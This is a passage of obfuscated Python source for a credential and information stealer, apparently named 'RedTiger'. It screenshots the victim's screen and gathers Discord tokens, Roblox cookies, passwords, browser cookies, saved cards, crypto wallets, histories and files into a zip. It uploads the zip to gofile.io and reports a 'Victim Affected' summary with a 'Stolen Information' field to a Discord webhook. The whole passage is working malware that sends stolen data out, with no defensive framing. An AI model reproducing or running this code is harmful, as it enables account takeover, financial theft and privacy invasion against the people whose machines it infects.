    if not XAVOMETUYXDOAQHDXWHHUELKCGTEJWILRIZQTXIECYSMUBOYYRGKMJUFOQVIVPRVUVVTOHEBCBTSTGYKUDFN:
        JNZOALPCEETSCKMUOINTCDNTHXSUVAHYSTTTRHCACJFYISDBTTAZODIXGLF = "No roblox cookie found."
        
    KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA.writestr(f"Roblox Accounts ({VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR}).txt", JNZOALPCEETSCKMUOINTCDNTHXSUVAHYSTTTRHCACJFYISDBTTAZODIXGLF)

    return VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR

def FLUNLXWVDPYFYVWZOSCKPSSWRIULNUFMRHFQCWTGYVSHLGGGRTJPZLVKEXMWZJBLRKUMTEKHTGGK(zip_file):
    import io
    from PIL import ImageGrab

    try:
        OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED = "Yes"

        def C4ptur3():
            VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ = ImageGrab.grab(
                bbox=None,
                include_layered_windows=False,
                all_screens=True,
                xdisplay=None
            )
            VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes = io.BytesIO()
            VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ.save(VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes, format='PNG')
            VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes.seek(0)
            return VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes

        VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes = C4ptur3()
        zip_file.writestr("Screenshot.png", VMQODPTBPUVMOJRCRVJJJTSQPDCTJMVOQICXMFKADTCJUVOZBXGRBMIQGOJRWNJ_bytes.read())
        return OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED
    except Exception as e:
        OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED = f"Error: {e}"
        return OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED

def JUYDCPIFJCAOUPOIALJTWRDSZZMZBOFSXHDXQDCSRIIQRCXSBESAHNXDTOTSZPLDWXPOCNOBBYSI():
    import tkinter as tk
    from tkinter import messagebox
    root = tk.Tk()
    root.withdraw()
    messagebox.showerror("chances.exe", "fucked by chances")

XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA = []

ROLSXOGTHSXAFQWMWLAAUKBYCUANZZHVTUIUPGMCKXTSNPBFYKZZFZCLAJEMJFYBTRDSGCTRQNNYZWAUUXZBKD = io.BytesIO()
with zipfile.ZipFile(ROLSXOGTHSXAFQWMWLAAUKBYCUANZZHVTUIUPGMCKXTSNPBFYKZZFZCLAJEMJFYBTRDSGCTRQNNYZWAUUXZBKD, "w", zipfile.ZIP_DEFLATED) as KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA:

    try: 
        GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR = ZUESDUQYPMKFSFXCNGGDYOQRLVGTCJYBNHYNZJTJWIUCZURNMEUAHNFCKEKKBZYURKNKBIUESCPNBSTIXCXWKSSWCBYB()
    except Exception as e:
        GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR = f"Error: {e}"

    try: 
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info = KSBSLDEZCCQTZQEUKSCHGAXIKERROSZDXOSYYCTLYAXQDIVVVIBFXHBCOEYYULSGJGLEAHZQVVWGCSR(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info = f"Error: {e}"

    try: 
        KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW = AXIHCNNFFPCUHJOOVISNLNSKTRSPVJLGUCPMRPOFLLYEMOUILOUYONVGGKKHGSCZWCQZLNASSICGGWUKMCXHWZTQSWRL(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW = f"Error: {e}"

    try: 
        FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV, HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI, IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM, RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH, CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW, HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE = ZYVURKSRUJTMAINLEHXOTBFAZNGBTDFWZJJXKWIDKZTJYILNFRGEQRTWXXQJ(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV = f"Error: {e}"
        HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI = f"Error: {e}"
        IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM = f"Error: {e}"
        RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH = f"Error: {e}"
        CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW = f"Error: {e}"
        HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE = f"Error: {e}"

    try: 
        VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR = AAZJTVXPHCFYDKSXIZGLSWOGSGDUIKYMSPKUHAEKVXJFDUMSYVUAAODESOSCFSRFKBXNZSIYCAHLMRC(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR = f"Error: {e}"

    try: 
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture = WWQLNSZYESPSVXUWFAEDJVTSGSBDJGWXQFVHWZWFWFAQNSEBFVJGNACLSEEODJQXITAVJZDEFRY(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture = f"Error: {e}"

    try: 
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_screenshot = FLUNLXWVDPYFYVWZOSCKPSSWRIULNUFMRHFQCWTGYVSHLGGGRTJPZLVKEXMWZJBLRKUMTEKHTGGK(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_screenshot = f"Error: {e}"

    try: 
        XMFDBDUSVYLDUVHNZKRTBERIKVVYOLBPKFETYIHVJLXQVBWEJJBUPPSSYFNOYOBVOETJ, KCDGBHPSGKKTQUKPGJUAZHFQWPCUXDEIVPUTDFGUAUTGDYYAPVYTKYMKNEUZX, VSGWGQOLXHAAGSNFMZGBIISMUFXNFGUXJNBSZCQUWGBTKGFQAZXOUJCXCF = XJJISHODTWDDGYSIINTYPFKGZIERVJTMTIPKPIVDOXYQTWTJJKWONQUCESVYSCVEIIUUZNAK(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_screenshot = f"Error: {e}"

    try: 
        IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX = LBGXGCJRRDXLCCAXSZJICLYWXELONUOOKJCZEZLJFIFRTZBVNWGGUDUIPEJMIXVFZKNKNDFRMJRNUMQODD(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA)
    except Exception as e:
        IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX = f"Error: {e}"

    if GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Discord Injection : {GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR}")

    if FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Camera Capture    : {FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture}")

    if FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_screenshot != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Screenshot        : {FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_screenshot}")

    if FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"System Info       : {FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info}")

    if KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Discord Accounts  : {KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW}")

    if VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Roblox Accounts   : {VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR}")

    if HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Passwords         : {HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI}")

    if IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Cookies           : {IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM}")

    if HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Cards             : {HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE}")

    if RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Browsing History  : {RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH}")

    if CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Download History  : {CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW}")

    if FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Extentions        : {FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV}")

    if XMFDBDUSVYLDUVHNZKRTBERIKVVYOLBPKFETYIHVJLXQVBWEJJBUPPSSYFNOYOBVOETJ != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Wallets           : {XMFDBDUSVYLDUVHNZKRTBERIKVVYOLBPKFETYIHVJLXQVBWEJJBUPPSSYFNOYOBVOETJ}")

    if KCDGBHPSGKKTQUKPGJUAZHFQWPCUXDEIVPUTDFGUAUTGDYYAPVYTKYMKNEUZX != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Game Launchers    : {KCDGBHPSGKKTQUKPGJUAZHFQWPCUXDEIVPUTDFGUAUTGDYYAPVYTKYMKNEUZX}")
    
    if VSGWGQOLXHAAGSNFMZGBIISMUFXNFGUXJNBSZCQUWGBTKGFQAZXOUJCXCF != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Apps              : {VSGWGQOLXHAAGSNFMZGBIISMUFXNFGUXJNBSZCQUWGBTKGFQAZXOUJCXCF}")
    
    if IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX != None:
        XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA.append(f"Interesting Files : {IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX}")

ROLSXOGTHSXAFQWMWLAAUKBYCUANZZHVTUIUPGMCKXTSNPBFYKZZFZCLAJEMJFYBTRDSGCTRQNNYZWAUUXZBKD.seek(0)

try:
    try: PNLNWHTGHEADHGZTKLGBGSKTDURCOWZPSOVLGSQHUIQZZMTSIRTSZUERKYXCGZWCJUTWLUALVJA = loads(urlopen("https://api.gofile.io/getServer").read().decode('utf-8'))["data"]["server"]
    except: PNLNWHTGHEADHGZTKLGBGSKTDURCOWZPSOVLGSQHUIQZZMTSIRTSZUERKYXCGZWCJUTWLUALVJA = "store4"

    HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW = requests.post(
        f"https://{PNLNWHTGHEADHGZTKLGBGSKTDURCOWZPSOVLGSQHUIQZZMTSIRTSZUERKYXCGZWCJUTWLUALVJA}.gofile.io/uploadFile",
        files={"file": (f"RedTiger_{GUHUDRUFCEGYZVTEKWIPROLLTXXIAHPKEAFWWKPFPWODGQRZANTOYDPPNZVKKMZLDGKPZCFLFZEIMTREWKXGRPIZYMCKGP.replace(' ', '_')}.zip", ROLSXOGTHSXAFQWMWLAAUKBYCUANZZHVTUIUPGMCKXTSNPBFYKZZFZCLAJEMJFYBTRDSGCTRQNNYZWAUUXZBKD)}
    )

    ATAKUXBFFZEAGVOFZKILLQQHHRTZCTYPJACTUOURRQAYWMUTFEHTDNONADSKTFVMQTOUENFXYOCQPILYIPLQVFLFPH = HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW.json()["data"]["downloadPage"]
except Exception as e:
    ATAKUXBFFZEAGVOFZKILLQQHHRTZCTYPJACTUOURRQAYWMUTFEHTDNONADSKTFVMQTOUENFXYOCQPILYIPLQVFLFPH = f"Error: {e}"

embed = discord.Embed(title="Victim Affected", color=YNXDYLNNLXXBSOYGPDWRPNKDVCVNMQIWXLBCGFGQBWSCPVCUMYPUEN
).add_field(
    inline=False,
    name="Summary of Information", 
    value=f"""```
Hostname    : {HLLPLDJQJQOPNSAOGEOPSPVKMIZESBEXMHQZVJOZMCHTWKTGNUEJZAUWHSIDUYAOBDVBKBHWYFPGAEVDBFZLALUQSRDVOBGNNMDO}
Username    : {GUHUDRUFCEGYZVTEKWIPROLLTXXIAHPKEAFWWKPFPWODGQRZANTOYDPPNZVKKMZLDGKPZCFLFZEIMTREWKXGRPIZYMCKGP}
DisplayName : {TVAVMKPTPPIHBJGRSDEAWYSOYXVLKKWGOWFIQKCNXOPRKDJUVYLKEDRXMRZCHMDOGQGKMJKOOG}
Ip Public   : {TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH}
Ip Local    : {WQICKGMIKTKZVFSKRDXYHDVJNUMRRQPYWZPLCYLUOMZEXGUMJDSAILTD}
Country     : {NJMHHGCNQKAYJYHVDMZKFEGVTZWSOVRBMPSQASKBVLLQYUHZBHWQDORWEXNDGVS}```"""
).add_field(
    inline=False,
    name="Stolen Information", 
    value=f"""```swift
{"\n".join(XHJURYJDRHDWMXVOOPYWBLYMKAXRVXEIHRRRXKYILYJBBKIJNUBIJMBQKJIDIDYMYDVSNIARHRA)}```"""
).add_field(
    inline=False,
    name="Download Link", 
    value=f"""{ATAKUXBFFZEAGVOFZKILLQQHHRTZCTYPJACTUOURRQAYWMUTFEHTDNONADSKTFVMQTOUENFXYOCQPILYIPLQVFLFPH}"""
).set_footer(
    text=MMTBWOCADOKKYVLHYBFJTMTXAYISZXXCIWKJUWEJXHLTJFMJDJBKLMBVCTJYKDCAUXCSTJAIMDVVZOHWFYB, 
    icon_url=ACFESDPMYEXDCVNURJEFLDWOYUCGUSMYUHTJDOMWCJOYZDQBAGRUZRBFSKQFOARUSXLCMBDSPTMRUWUAHUDBO
)

try:  
    WCBKJXSXTJAHWXPHQSINWKDBFYKRKEZFHUQHBQIXTQOESQIGHRMZFGNXDUGDZXWGHAKBNZKT = discord.SyncWebhook.from_url(UVUTRMNXKVMWXPSUNUXNQHIZZCWIHUYAMWPNAKVCZHIQVGAOHNXGXTKRRDUMDVJ)
    WCBKJXSXTJAHWXPHQSINWKDBFYKRKEZFHUQHBQIXTQOESQIGHRMZFGNXDUGDZXWGHAKBNZKT.send(embed=embed, username=BABMQIGUZFXUYWNPCSXFJVHWLRBDQMHVFSSBHSQWEVGXKDXFJLPTPYTZXTQZRMATNUWIJBFIVVGMGNEWVRREDYGWQXDRVDL, avatar_url=ACFESDPMYEXDCVNURJEFLDWOYUCGUSMYUHTJDOMWCJOYZDQBAGRUZRBFSKQFOARUSXLCMBDSPTMRUWUAHUDBO)
except: pass


try: threading.Thread(target=KXVONBQFRFWKHUWVVBTGBAQBERZYUXQPFTWJXMLCSMNMPKOISBCAMIZIQFMKSUXGYDKILXSZTOM).start()
except: pass
try: threading.Thread(target=QABPYRPNILIURWJVLJORJCTZXYCOOVKELBTGWQASMCHFDHQYOWEIBOUMONCOCJFAHDZMQIRPRROCFQUGGM).start()
except: pass
try: threading.Thread(target=CEPQHCYDTKNMOGCNWFFIHQDNZGSOCVMOFPWEGJHSQNPHEOTHBBZKRYNHCGHGXAVOQFOVMPTZBCETA).start()
except: pass
try: threading.Thread(target=UMLUCSXPNYEKHRDXOHNNCTVWABIDPSHDASWQHGOTAMVQSHJZCMBESQJCFDONVA).start()
except: pass
try: threading.Thread(target=AKJFXABOFUBVWJWHKSJEKYFYWHUNZJUVOXOGHIRXBPZZXGWSYSBHSNXOHJWIPWXPGDFZSYGLMCE).start()
except: pass
try: threading.Thread(target=ESYVFYPORILATCINOSXYLOBTURCSNQBCKASKHDAYIPBQIXTJCJMPNZNYFYUPAVDRYJOIDCAREETWHZFIHIFSECJH).start()
except: pass
try: threading.Thread(target=JUYDCPIFJCAOUPOIALJTWRDSZZMZBOFSXHDXQDCSRIIQRCXSBESAHNXDTOTSZPLDWXPOCNOBBYSI).start()
except: pass
try: threading.Thread(target=PDZUIZPJAJEYCDYWUUNYBTZJAGSXDUBQIWVVFEIIIDZDFBFOYXWVAGKEFAUXRSNZWSWLVSHRZMF).start()
except: pass
